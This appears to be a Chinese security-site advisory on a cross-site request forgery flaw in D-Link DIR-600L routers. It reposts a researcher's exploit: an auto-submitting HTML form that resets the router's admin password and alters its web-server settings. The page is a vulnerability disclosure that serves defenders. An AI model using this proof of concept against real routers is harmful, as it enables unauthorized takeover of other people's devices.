Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / D-Link DIR-600L跨站请求伪造漏洞

发布日期:2014-03-24
更新日期:2014-03-25受影响系统:
D-Link DIR-600L
描述:
--------------------------------------------------------------------------------
D-Link DIR-600L是款无线路由器产品。
 
D-Link DIR-600L修订版A1固件版本1.0、修订版B1固件版本2.0,没有正确检查某些请求的合法性,这可使某些用户通过HTTP请求执行未授权操作。
 
<*来源:Dhruv Shah
 
 链接:http://secunia.com/advisories/57392/
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#################################################################################### # Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
 CSRF Vulnerability
 # Google Dork: N/A
 # Date: 20/03/2014
 # Exploit Author: Dhruv Shah
 # Vendor Homepage:
 http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
 # Software Link: N/A
 # Hardware Version:E4 # Firmware Version:5.10
 # Tested on: Router Web Server
 # CVE : N/A ################################################################################### Cross Site Request Forgery  This Modem"s Web Application , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.  The Modems"s Application  not using any security token to prevent it against CSRF. You can manipulate any userdata. PoC and Exploit to change user password:
 In the POC the IP address in the POST is the modems IP address. <html> <body>
   <form id ="poc" action="http://192.168.0.1/goform/formSetPassword"
 method="POST">
     <input type="hidden" name="settingsChanged" value="1" />
     <input type="hidden" name="config.login_name" value="admin" />
     <input type="hidden" name="config.password" value="YWRtaW4A" />
     <input type="hidden"
 name="config.web_server_allow_graphics_auth"
 value="false" />
     <input type="hidden"
 name="config.web_server_allow_wan_http" value="false" />
     <input type="hidden"
 name="config.web_server_wan_port_http" value="8080" />
     <input type="hidden"
 name="config.wan_web_ingress_filter_name" value="" />
     <input type="hidden" name="wan_ingress_filter_details"
 value="" />
   </form>
 </body>
   <script type="text/javascript">
 document.getElementById("poc").submit();
 </script> </html>
 ______________________ *Dhruv Shah* *aka Snypter* Blogger | Researcher | Consultant | Writer
 Youtube <http://www.youtube.com/snypter> |
 Facebook<http://www.facebook.com/dhruvshahs>|
 Linkedin <http://in.linkedin.com/pub/dhruv-shah/26/4a6/aa0> |
 Twitter<https://twitter.com/Snypter>|
 Blog <http://security-geek.in/blog/>建议:
--------------------------------------------------------------------------------
厂商补丁:
 
D-Link
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.dlink.com/Microsoft Word RTF文件解析错误代码执行漏洞(CVE-2014-1761)OpenSSH "child_set_env()"函数安全限制绕过漏洞相关资讯      D-Link  D-Link漏洞 
  • 多个D-Link产品UPnP缓冲区溢出漏洞  (07/29/2015 13:27:45)
  • D-Link DIR-645路由器远程任意命令  (06/02/2015 19:48:48)
  • D-Link DIR-601身份验证绕过漏洞  (05/05/2015 14:10:55)
  • 多个D-Link产品HTTP缓冲区溢出漏洞  (07/29/2015 13:27:16)
  • 多个D-Link产品缓冲区溢出漏洞(CVE  (06/02/2015 19:45:40)
  • D-Link和趋势网络路由器发现远程执  (04/30/2015 07:44:07)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款